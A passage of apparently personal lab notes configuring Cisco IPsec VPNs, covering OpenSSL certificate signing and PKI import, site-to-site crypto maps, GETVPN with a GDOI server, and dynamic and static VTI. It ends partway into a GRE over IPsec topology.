VQQDEw1jYW5ldC5sYWIubmV0MRswGQYJKoZIhvcNAQkBFgxyb290QGxhYi5uZXQw
HhcNMTIxMDA3MTkwNTE2WhcNMTMxMDA3MTkwNTE2WjBcMQswCQYDVQQGEwJFUzEM
MAoGA1UECBMDQ0FUMQ4wDAYDVQQKEwVDQW5ldDEUMBIGA1UECxMLRW5naW5lZXJp
bmcxGTAXBgNVBAMTEHJvdXRlci0xLmxhYi5uZXQwgZ8wDQYJKoZIhvcNAQEBBQAD
gY0AMIGJAoGBAMMkaelp374uX/YN0a6ZglZicHFPa5bJKWr/lEGGkqKDINaD/VYQ
F/Fz3YiZ0q7PjfwZegtb6vpJfAmR6zO+wW4qoo1923nMLzJkJwBDNaEzpEvfpRAq
FFler6QEYaEPJMgMHHyGA4S4L1KcroAJqm8+ZHZjvfxMFLEtrTTmhUhTAgMBAAGj
ezB5MAkGA1UdEwQCMAAwLAYJYIZIAYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVk
IENlcnRpZmljYXRlMB0GA1UdDgQWBBSB36sPwGsxSwhebYYRJpyQhfWDjzAfBgNV
HSMEGDAWgBQFd61pR5IFYkoMsIAJVAsKiS/9yDANBgkqhkiG9w0BAQUFAAOBgQCE
ZRG129/0ztU816TTELjM1cU1w36V5tIL4qkO9rTnpAD0C9IEo7G8ukRNaqmi8oTq
W3CXUkYb/YZ0f3WIUG4QWcUghKa0j1kwf4ynfhNghd5apI/OBbp8xoT9ENCGwPO2
SQLae5wpyIrZfcPRUc0O9LFKLWwmFga6GcJ5jj/jTg==
-----END CERTIFICATE-----
Data Base Updated

LINUX-CA# cat router-2.csr
-----BEGIN CERTIFICATE REQUEST-----
MIIB3jCCAUcCAQAwfTEZMBcGA1UEAxMQcm91dGVyLTIubGFiLm5ldDEUMBIGA1UE
CxMLRW5naW5lZXJpbmcxDjAMBgNVBAoTBUNBbmV0MQwwCgYDVQQIEwNDQVQxCzAJ
BgNVBAYTAkVTMR8wHQYJKoZIhvcNAQkCFhByb3V0ZXItMi5sYWIubmV0MIGfMA0G
CSqGSIb3DQEBAQUAA4GNADCBiQKBgQCp+XYSYBFz1iBJEoXSvWjslMSmClPGULuu
VbOnKme8SkWUKbwUUKzP73nSSzMQy1bJqmRaNv2ZKBL/7fmRqUcEKL6mFLaz7i9w
hpUieO65QLEaW1O9skMuwZziwgzR/rbPx+AyZg/3qI6WLKm/NayDZK102fcFuD95
LCYx4AdwPQIDAQABoCEwHwYJKoZIhvcNAQkOMRIwEDAOBgNVHQ8BAf8EBAMCBaAw
DQYJKoZIhvcNAQEEBQADgYEAAmwl6OdFYzRzPmnFgeqC7unXOtpWNwccQs0CTAna
EdKu+dtGB3wEruGciASOTJZGX33Y+p4SmXdNDk50Bvpc8pqMveDuLbDASeeJmQqo
Wzjv6FZ3r+/qf1xJwSXVhsE4K53XOfaoU4Wb+DTyyHskyqU+GkcJujIa7wTNEoHK
Uf8=
-----END CERTIFICATE REQUEST-----
LINUX-CA# openssl ca -in router-2.csr -config /etc/ssl/openssl.cnf
Using configuration from /etc/ssl/openssl.cnf
Enter pass phrase for /etc/ssl/private/cakey.pem:MY_SECRET
Check that the request matches the signature
Signature ok
Certificate Details:
        Serial Number: 2 (0x2)
        Validity
            Not Before: Oct  7 19:06:24 2012 GMT
            Not After : Oct  7 19:06:24 2013 GMT
        Subject:
            countryName               = ES
            stateOrProvinceName       = CAT
            organizationName          = CAnet
            organizationalUnitName    = Engineering
            commonName                = router-2.lab.net
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            Netscape Comment: 
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier: 
                58:C3:3C:F3:1D:8C:D3:02:3A:83:AF:8B:C6:BD:7F:48:B8:54:3A:0A
            X509v3 Authority Key Identifier: 
                keyid:05:77:AD:69:47:92:05:62:4A:0C:B0:80:09:54:0B:0A:89:2F:FD:C8

Certificate is to be certified until Oct  7 19:06:24 2013 GMT (365 days)
Sign the certificate? [y/n]:y


1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 2 (0x2)
    Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=ES, ST=CAT, L=BCN, O=CAnet, CN=canet.lab.net/emailAddress=root@lab.net
        Validity
            Not Before: Oct  7 19:06:24 2012 GMT
            Not After : Oct  7 19:06:24 2013 GMT
        Subject: C=ES, ST=CAT, O=CAnet, OU=Engineering, CN=router-2.lab.net
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:a9:f9:76:12:60:11:73:d6:20:49:12:85:d2:bd:
                    68:ec:94:c4:a6:0a:53:c6:50:bb:ae:55:b3:a7:2a:
                    67:bc:4a:45:94:29:bc:14:50:ac:cf:ef:79:d2:4b:
                    33:10:cb:56:c9:aa:64:5a:36:fd:99:28:12:ff:ed:
                    f9:91:a9:47:04:28:be:a6:14:b6:b3:ee:2f:70:86:
                    95:22:78:ee:b9:40:b1:1a:5b:53:bd:b2:43:2e:c1:
                    9c:e2:c2:0c:d1:fe:b6:cf:c7:e0:32:66:0f:f7:a8:
                    8e:96:2c:a9:bf:35:ac:83:64:ad:74:d9:f7:05:b8:
                    3f:79:2c:26:31:e0:07:70:3d
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            Netscape Comment: 
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier: 
                58:C3:3C:F3:1D:8C:D3:02:3A:83:AF:8B:C6:BD:7F:48:B8:54:3A:0A
            X509v3 Authority Key Identifier: 
                keyid:05:77:AD:69:47:92:05:62:4A:0C:B0:80:09:54:0B:0A:89:2F:FD:C8

    Signature Algorithm: sha1WithRSAEncryption
         55:06:3f:87:2a:2b:a3:a4:e3:c9:c2:26:34:f5:e6:36:d0:52:
         08:41:4b:0c:34:48:b9:9e:2d:b6:ad:33:02:a3:2c:84:78:ed:
         a5:9c:f3:cf:1e:6b:6a:da:58:93:d4:22:25:91:37:44:5b:84:
         76:40:e4:b1:55:94:1d:70:55:ce:06:c3:7e:2d:0f:b7:51:63:
         fc:74:1f:e4:34:4f:38:45:16:8e:bd:fe:36:7b:c0:ba:97:ce:
         97:d5:0e:16:1b:a4:46:e1:a8:3a:5f:77:a7:9b:c4:3c:e5:78:
         58:d4:5f:f5:c6:91:05:5a:b5:2c:93:8b:c1:65:f3:45:6f:0f:
         7f:22
-----BEGIN CERTIFICATE-----
MIICuzCCAiSgAwIBAgIBAjANBgkqhkiG9w0BAQUFADBuMQswCQYDVQQGEwJFUzEM
MAoGA1UECBMDQ0FUMQwwCgYDVQQHEwNCQ04xDjAMBgNVBAoTBUNBbmV0MRYwFAYD
VQQDEw1jYW5ldC5sYWIubmV0MRswGQYJKoZIhvcNAQkBFgxyb290QGxhYi5uZXQw
HhcNMTIxMDA3MTkwNjI0WhcNMTMxMDA3MTkwNjI0WjBcMQswCQYDVQQGEwJFUzEM
MAoGA1UECBMDQ0FUMQ4wDAYDVQQKEwVDQW5ldDEUMBIGA1UECxMLRW5naW5lZXJp
bmcxGTAXBgNVBAMTEHJvdXRlci0yLmxhYi5uZXQwgZ8wDQYJKoZIhvcNAQEBBQAD
gY0AMIGJAoGBAKn5dhJgEXPWIEkShdK9aOyUxKYKU8ZQu65Vs6cqZ7xKRZQpvBRQ
rM/vedJLMxDLVsmqZFo2/ZkoEv/t+ZGpRwQovqYUtrPuL3CGlSJ47rlAsRpbU72y
Qy7BnOLCDNH+ts/H4DJmD/eojpYsqb81rINkrXTZ9wW4P3ksJjHgB3A9AgMBAAGj
ezB5MAkGA1UdEwQCMAAwLAYJYIZIAYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVk
IENlcnRpZmljYXRlMB0GA1UdDgQWBBRYwzzzHYzTAjqDr4vGvX9IuFQ6CjAfBgNV
HSMEGDAWgBQFd61pR5IFYkoMsIAJVAsKiS/9yDANBgkqhkiG9w0BAQUFAAOBgQBV
Bj+HKiujpOPJwiY09eY20FIIQUsMNEi5ni22rTMCoyyEeO2lnPPPHmtq2liT1CIl
kTdEW4R2QOSxVZQdcFXOBsN+LQ+3UWP8dB/kNE84RRaOvf42e8C6l86X1Q4WG6RG
4ag6X3enm8Q85XhY1F/1xpEFWrUsk4vBZfNFbw9/Ig==
-----END CERTIFICATE-----
Data Base Updated

LINUX-CA# ls -l /etc/ssl/newcerts
total 8
-rw-r--r-- 1 root root 3104 oct  7 21:05 01.pem
-rw-r--r-- 1 root root 3104 oct  7 21:06 02.pem

Importing CA certificate

router-1(config)# crypto pki authenticate INCAWETRUST

Enter the base 64 encoded CA certificate.
End with a blank line or the word "quit" on a line by itself

-----BEGIN CERTIFICATE-----
MIICqjCCAhOgAwIBAgIJANGQlt8Z5+XTMA0GCSqGSIb3DQEBBQUAMG4xCzAJBgNV
BAYTAkVTMQwwCgYDVQQIEwNDQVQxDDAKBgNVBAcTA0JDTjEOMAwGA1UEChMFQ0Fu
ZXQxFjAUBgNVBAMTDWNhbmV0LmxhYi5uZXQxGzAZBgkqhkiG9w0BCQEWDHJvb3RA
bGFiLm5ldDAeFw0xMjEwMDcxOTAzMjZaFw0yMjEwMDUxOTAzMjZaMG4xCzAJBgNV
BAYTAkVTMQwwCgYDVQQIEwNDQVQxDDAKBgNVBAcTA0JDTjEOMAwGA1UEChMFQ0Fu
ZXQxFjAUBgNVBAMTDWNhbmV0LmxhYi5uZXQxGzAZBgkqhkiG9w0BCQEWDHJvb3RA
bGFiLm5ldDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA1f6Y35sevFE14T33
5oRwMrCIZ8b6c2kLd1M9CqJqVlc0Ru37k/PLm4RmIy+d45JpL5GizuUn1XtAWI1N
/rdO8FrAKQ0SNNTRgT3MeJJX9iWbYcWj6atgntxxY5fLHszbXyohxnQieFjgq6oz
PuKXTEO3jIQhe+yZtg4fhbT/BN0CAwEAAaNQME4wHQYDVR0OBBYEFAV3rWlHkgVi
SgywgAlUCwqJL/3IMB8GA1UdIwQYMBaAFAV3rWlHkgViSgywgAlUCwqJL/3IMAwG
A1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADgYEAxSnlrZhAMH0FmTMlXVGlzWa1
Rf/8Q8TJ+bA3Z6LwaaPQb/+9oAnF7MVsLnhbWd7XEyn1AM7qxgrlhFidRMKFnoJq
cEevAM2hBbsxaE1EA0eWycsM/z8rA4Flnp8IKo/Wds0+L64FqRDjTfsBfcbRiCem
Nsick9kDj2oiDw+f6mY=
-----END CERTIFICATE-----

Certificate has the following attributes:
       Fingerprint MD5: B81F447E E0E17975 C95F9E27 10EA609E 
      Fingerprint SHA1: B373CB7E BF3CB28A 731A4142 C83C3770 95A8A98B 

% Do you accept this certificate? [yes/no]: yes
Trustpoint CA certificate accepted.
% Certificate successfully imported
router-2(config)# crypto pki authenticate INCAWETRUST

Enter the base 64 encoded CA certificate.
End with a blank line or the word "quit" on a line by itself

-----BEGIN CERTIFICATE-----
MIICqjCCAhOgAwIBAgIJANGQlt8Z5+XTMA0GCSqGSIb3DQEBBQUAMG4xCzAJBgNV
BAYTAkVTMQwwCgYDVQQIEwNDQVQxDDAKBgNVBAcTA0JDTjEOMAwGA1UEChMFQ0Fu
ZXQxFjAUBgNVBAMTDWNhbmV0LmxhYi5uZXQxGzAZBgkqhkiG9w0BCQEWDHJvb3RA
bGFiLm5ldDAeFw0xMjEwMDcxOTAzMjZaFw0yMjEwMDUxOTAzMjZaMG4xCzAJBgNV
BAYTAkVTMQwwCgYDVQQIEwNDQVQxDDAKBgNVBAcTA0JDTjEOMAwGA1UEChMFQ0Fu
ZXQxFjAUBgNVBAMTDWNhbmV0LmxhYi5uZXQxGzAZBgkqhkiG9w0BCQEWDHJvb3RA
bGFiLm5ldDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA1f6Y35sevFE14T33
5oRwMrCIZ8b6c2kLd1M9CqJqVlc0Ru37k/PLm4RmIy+d45JpL5GizuUn1XtAWI1N
/rdO8FrAKQ0SNNTRgT3MeJJX9iWbYcWj6atgntxxY5fLHszbXyohxnQieFjgq6oz
PuKXTEO3jIQhe+yZtg4fhbT/BN0CAwEAAaNQME4wHQYDVR0OBBYEFAV3rWlHkgVi
SgywgAlUCwqJL/3IMB8GA1UdIwQYMBaAFAV3rWlHkgViSgywgAlUCwqJL/3IMAwG
A1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADgYEAxSnlrZhAMH0FmTMlXVGlzWa1
Rf/8Q8TJ+bA3Z6LwaaPQb/+9oAnF7MVsLnhbWd7XEyn1AM7qxgrlhFidRMKFnoJq
cEevAM2hBbsxaE1EA0eWycsM/z8rA4Flnp8IKo/Wds0+L64FqRDjTfsBfcbRiCem
Nsick9kDj2oiDw+f6mY=
-----END CERTIFICATE-----

Certificate has the following attributes:
       Fingerprint MD5: B81F447E E0E17975 C95F9E27 10EA609E 
      Fingerprint SHA1: B373CB7E BF3CB28A 731A4142 C83C3770 95A8A98B 

% Do you accept this certificate? [yes/no]: yes
Trustpoint CA certificate accepted.
% Certificate successfully imported

Importing signed certificate

router-1(config)# crypto pki import INCAWETRUST certificate

Enter the base 64 encoded certificate.
End with a blank line or the word "quit" on a line by itself

-----BEGIN CERTIFICATE-----
MIICuzCCAiSgAwIBAgIBATANBgkqhkiG9w0BAQUFADBuMQswCQYDVQQGEwJFUzEM
MAoGA1UECBMDQ0FUMQwwCgYDVQQHEwNCQ04xDjAMBgNVBAoTBUNBbmV0MRYwFAYD
VQQDEw1jYW5ldC5sYWIubmV0MRswGQYJKoZIhvcNAQkBFgxyb290QGxhYi5uZXQw
HhcNMTIxMDA3MTkwNTE2WhcNMTMxMDA3MTkwNTE2WjBcMQswCQYDVQQGEwJFUzEM
MAoGA1UECBMDQ0FUMQ4wDAYDVQQKEwVDQW5ldDEUMBIGA1UECxMLRW5naW5lZXJp
bmcxGTAXBgNVBAMTEHJvdXRlci0xLmxhYi5uZXQwgZ8wDQYJKoZIhvcNAQEBBQAD
gY0AMIGJAoGBAMMkaelp374uX/YN0a6ZglZicHFPa5bJKWr/lEGGkqKDINaD/VYQ
F/Fz3YiZ0q7PjfwZegtb6vpJfAmR6zO+wW4qoo1923nMLzJkJwBDNaEzpEvfpRAq
FFler6QEYaEPJMgMHHyGA4S4L1KcroAJqm8+ZHZjvfxMFLEtrTTmhUhTAgMBAAGj
ezB5MAkGA1UdEwQCMAAwLAYJYIZIAYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVk
IENlcnRpZmljYXRlMB0GA1UdDgQWBBSB36sPwGsxSwhebYYRJpyQhfWDjzAfBgNV
HSMEGDAWgBQFd61pR5IFYkoMsIAJVAsKiS/9yDANBgkqhkiG9w0BAQUFAAOBgQCE
ZRG129/0ztU816TTELjM1cU1w36V5tIL4qkO9rTnpAD0C9IEo7G8ukRNaqmi8oTq
W3CXUkYb/YZ0f3WIUG4QWcUghKa0j1kwf4ynfhNghd5apI/OBbp8xoT9ENCGwPO2
SQLae5wpyIrZfcPRUc0O9LFKLWwmFga6GcJ5jj/jTg==
-----END CERTIFICATE-----

% Router Certificate successfully imported
router-2(config)# crypto pki import INCAWETRUST certificate

Enter the base 64 encoded certificate.
End with a blank line or the word "quit" on a line by itself

-----BEGIN CERTIFICATE-----
MIICuzCCAiSgAwIBAgIBAjANBgkqhkiG9w0BAQUFADBuMQswCQYDVQQGEwJFUzEM
MAoGA1UECBMDQ0FUMQwwCgYDVQQHEwNCQ04xDjAMBgNVBAoTBUNBbmV0MRYwFAYD
VQQDEw1jYW5ldC5sYWIubmV0MRswGQYJKoZIhvcNAQkBFgxyb290QGxhYi5uZXQw
HhcNMTIxMDA3MTkwNjI0WhcNMTMxMDA3MTkwNjI0WjBcMQswCQYDVQQGEwJFUzEM
MAoGA1UECBMDQ0FUMQ4wDAYDVQQKEwVDQW5ldDEUMBIGA1UECxMLRW5naW5lZXJp
bmcxGTAXBgNVBAMTEHJvdXRlci0yLmxhYi5uZXQwgZ8wDQYJKoZIhvcNAQEBBQAD
gY0AMIGJAoGBAKn5dhJgEXPWIEkShdK9aOyUxKYKU8ZQu65Vs6cqZ7xKRZQpvBRQ
rM/vedJLMxDLVsmqZFo2/ZkoEv/t+ZGpRwQovqYUtrPuL3CGlSJ47rlAsRpbU72y
Qy7BnOLCDNH+ts/H4DJmD/eojpYsqb81rINkrXTZ9wW4P3ksJjHgB3A9AgMBAAGj
ezB5MAkGA1UdEwQCMAAwLAYJYIZIAYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVk
IENlcnRpZmljYXRlMB0GA1UdDgQWBBRYwzzzHYzTAjqDr4vGvX9IuFQ6CjAfBgNV
HSMEGDAWgBQFd61pR5IFYkoMsIAJVAsKiS/9yDANBgkqhkiG9w0BAQUFAAOBgQBV
Bj+HKiujpOPJwiY09eY20FIIQUsMNEi5ni22rTMCoyyEeO2lnPPPHmtq2liT1CIl
kTdEW4R2QOSxVZQdcFXOBsN+LQ+3UWP8dB/kNE84RRaOvf42e8C6l86X1Q4WG6RG
4ag6X3enm8Q85XhY1F/1xpEFWrUsk4vBZfNFbw9/Ig==
-----END CERTIFICATE-----

% Router Certificate successfully imported

Configuring static crypto maps

router-1(config)# crypto isakmp policy 1
router-1(config-isakmp)# authentication rsa-sig
router-1(config-isakmp)# encryption aes
router-1(config-isakmp)# group 2
router-1(config-isakmp)# lifetime 86400
router-1(config)# crypto isakmp aggressive-mode disable
router-1(config)# crypto isakmp enable
router-1(config)# ip access-list extended CRYPTO_ACL
router-1(config-ext-nacl)# permit ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255
router-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
router-1(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
router-1(config-crypto-map)# set peer 12.12.12.2
router-1(config-crypto-map)# match address CRYPTO_ACL
router-1(config-crypto-map)# set transform-set TRANSFORM_SET
router-1(config-crypto-map)# set pfs group2
router-1(config)# interface fa0/0
router-1(config-if)# crypto map CRYPTO_MAP
router-1(config-if)# ip nat outside
router-1(config)# interface fa0/1
router-1(config-if)# ip nat inside
router-1(config)# ip route 192.168.2.0 255.255.255.0 12.12.12.2
router-1(config)# ip access-list extended ACL_NONAT
router-1(config-ext-nacl)# deny ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255
router-1(config-ext-nacl)# permit ip any any
router-1(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload
router-2(config)# crypto isakmp policy 1
router-2(config-isakmp)# authentication rsa-sig
router-2(config-isakmp)# encryption aes
router-2(config-isakmp)# hash sha
router-2(config-isakmp)# group 2
router-2(config-isakmp)# lifetime 86400
router-2(config)# crypto isakmp aggressive-mode disable
router-2(config)# crypto isakmp enable
router-2(config)# ip access-list extended CRYPTO_ACL
router-2(config-ext-nacl)# permit ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
router-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
router-2(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
router-2(config-crypto-map)# set peer 12.12.12.1
router-2(config-crypto-map)# match address CRYPTO_ACL
router-2(config-crypto-map)# set transform-set TRANSFORM_SET
router-2(config-crypto-map)# set pfs group2
router-2(config)# interface fa0/0
router-2(config-if)# crypto map CRYPTO_MAP
router-2(config-if)# ip nat outside
router-2(config)# interface fa0/1
router-2(config-if)# ip nat inside
router-2(config)# ip route 192.168.1.0 255.255.255.0 12.12.12.1
router-2(config)# ip access-list extended ACL_NONAT
router-2(config-ext-nacl)# deny ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
router-2(config-ext-nacl)# permit ip any any
router-2(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload

# Group Encrypted Transport VPN (GETVPN)


Topology

+[ROUTER-0]
|
+[ROUTER-1]----[DEVICE-1]
|
+[ROUTER-2]----[DEVICE-2]
|
+[ROUTER-3]----[DEVICE-3]

[ROUTER-0] fa0/0: 1.2.3.254/24

[ROUTER-1] fa0/0: 1.2.3.1/24
[ROUTER-1] fa0/1: 123.0.1.254/24
[DEVICE-1] fa0/1: 123.0.1.1/24

[ROUTER-2] fa0/0: 1.2.3.2/24
[ROUTER-2] fa0/1: 123.0.2.254/24
[DEVICE-2] fa0/1: 123.0.2.1/24

[ROUTER-3] fa0/0: 1.2.3.3/24
[ROUTER-3] fa0/1: 123.0.3.254/24
[DEVICE-3] fa0/1: 123.0.3.1/24

Note 1: All IP addresses are public.
Note 2: Communication encrypted from DEVICE-X to DEVICE-Y between ROUTER-X and ROUTER-Y.
Note 3: Tunnel mode with header preservation (IP addresses are also used for IPsec packets).

GDOI server

ROUTER-0(config)# crypto isakmp policy 1
ROUTER-0(config-isakmp)# authentication pre-share
ROUTER-0(config-isakmp)# encryption aes
ROUTER-0(config-isakmp)# hash sha
ROUTER-0(config-isakmp)# group 2
ROUTER-0(config-isakmp)# lifetime 86400
ROUTER-0(config)# crypto isakmp aggressive-mode disable
ROUTER-0(config)# crypto isakmp key 0 SECRET_KEY address 0.0.0.0 0.0.0.0
ROUTER-0(config)# crypto isakmp enable
ROUTER-0(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-0(config)# crypto ipsec profile PROFILE
ROUTER-0(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-0(ipsec-profile)# set pfs group2
ROUTER-0(config)# ip access-list extended CRYPTO_ACL
ROUTER-0(config-ext-nacl)# permit ip 123.0.0.0 0.0.255.255 123.0.0.0 0.0.255.255
ROUTER-0(config)# crypto gdoi group GDOI_GROUP
ROUTER-0(config-gdoi-group)# identity number 1
ROUTER-0(config-gdoi-group)# server local
ROUTER-0(gdoi-local-server)# rekey retransmit 10 number 3
ROUTER-0(gdoi-local-server)# rekey transport unicast
ROUTER-0(gdoi-local-server)# sa ipsec 1
ROUTER-0(gdoi-sa-ipsec)# profile PROFILE
ROUTER-0(gdoi-sa-ipsec)# match address ipv4 CRYPTO_ACL
ROUTER-0(gdoi-sa-ipsec)# replay time window-size 5
ROUTER-0(gdoi-local-server)# address ipv4 1.2.3.254

GDOI clients

Same configuration for all GDOI client routers.

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 1.2.3.254
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto gdoi group GDOI_GROUP
ROUTER-1(config-gdoi-group)# identity number 1
ROUTER-1(config-gdoi-group)# server address ipv4 1.2.3.254
ROUTER-1(config)# crypto map CRYPTO_MAP 1 gdoi
ROUTER-1(config-crypto-map)# set group GDOI_GROUP
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# crypto map CRYPTO_MAP
ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 1.2.3.254
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto gdoi group GDOI_GROUP
ROUTER-2(config-gdoi-group)# identity number 1
ROUTER-2(config-gdoi-group)# server address ipv4 1.2.3.254
ROUTER-2(config)# crypto map CRYPTO_MAP 1 gdoi
ROUTER-2(config-crypto-map)# set group GDOI_GROUP
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# crypto map CRYPTO_MAP
ROUTER-3(config)# crypto isakmp policy 1
ROUTER-3(config-isakmp)# authentication pre-share
ROUTER-3(config-isakmp)# encryption aes
ROUTER-3(config-isakmp)# hash sha
ROUTER-3(config-isakmp)# group 2
ROUTER-3(config-isakmp)# lifetime 86400
ROUTER-3(config)# crypto isakmp aggressive-mode disable
ROUTER-3(config)# crypto isakmp key 0 SECRET_KEY address 1.2.3.254
ROUTER-3(config)# crypto isakmp enable
ROUTER-3(config)# crypto gdoi group GDOI_GROUP
ROUTER-3(config-gdoi-group)# identity number 1
ROUTER-3(config-gdoi-group)# server address ipv4 1.2.3.254
ROUTER-3(config)# crypto map CRYPTO_MAP 1 gdoi
ROUTER-3(config-crypto-map)# set group GDOI_GROUP
ROUTER-3(config)# interface fa0/0
ROUTER-3(config-if)# crypto map CRYPTO_MAP

# Dynamic and static VTI


Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24
[ROUTER-1] vt1: 192.168.0.1/24 (virtual-template1)
[ROUTER-1] lo0: 192.168.0.1/24

[ROUTER-2] lo0: 192.168.0.2/24
[ROUTER-2] tu0: 192.168.0.2/24
[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2) fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Dynamic VTI (Hub)

The hub cannot initiate a site-to-site VPN because it does not know the peer IP address.

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto keyring KEYRING
ROUTER-1(conf-keyring)# pre-shared-key address 0.0.0.0 0.0.0.0 key 0 SECRET_KEY
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto isakmp profile PROFILE
ROUTER-1(conf-isa-prof)# match identity address 0.0.0.0 0.0.0.0
ROUTER-1(conf-isa-prof)# keyring KEYRING
ROUTER-1(conf-isa-prof)# virtual-template 1
ROUTER-1(config)# crypto ipsec profile PROFILE
ROUTER-1(config-profile)# set transform-set TRANSFORM_SET
ROUTER-1(config-profile)# set isakmp-profile PROFILE
ROUTER-1(config-profile)# set pfs group2
ROUTER-1(config)# interface lo0
ROUTER-1(config-if)# ip address 192.168.0.1 255.255.255.0
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface virtual-template1 type tunnel
ROUTER-1(config-if)# ip unnumbered lo0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel mode ipsec ipv4
ROUTER-1(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-1(config)# router ospf 1
ROUTER-1(config-router)# network 192.168.0.0 0.0.255.255 area 0
ROUTER-1(config-router)# passive-interface default
ROUTER-1(config-router)# no passive-interface virtual-template1

Static VTI (Spoke)

The spokes initiate the site-to-site VPN.

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto ipsec profile PROFILE
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface lo0
ROUTER-2(config-if)# ip address 192.168.0.2 255.255.255.0
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip unnumbered lo0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config-if)# tunnel mode ipsec ipv4
ROUTER-2(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-2(config)# router ospf 1
ROUTER-2(config-router)# network 192.168.0.0 0.0.255.255 area 0
ROUTER-2(config-router)# passive-interface default
ROUTER-2(config-router)# no passive-interface tu0

# GRE over IPsec


Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24
[ROUTER-1] tu0: 12.0.0.1/24

[ROUTER-2] tu0: 12.0.0.2/24
[ROUTER-2] fa0/0: 12.12.12.2/24
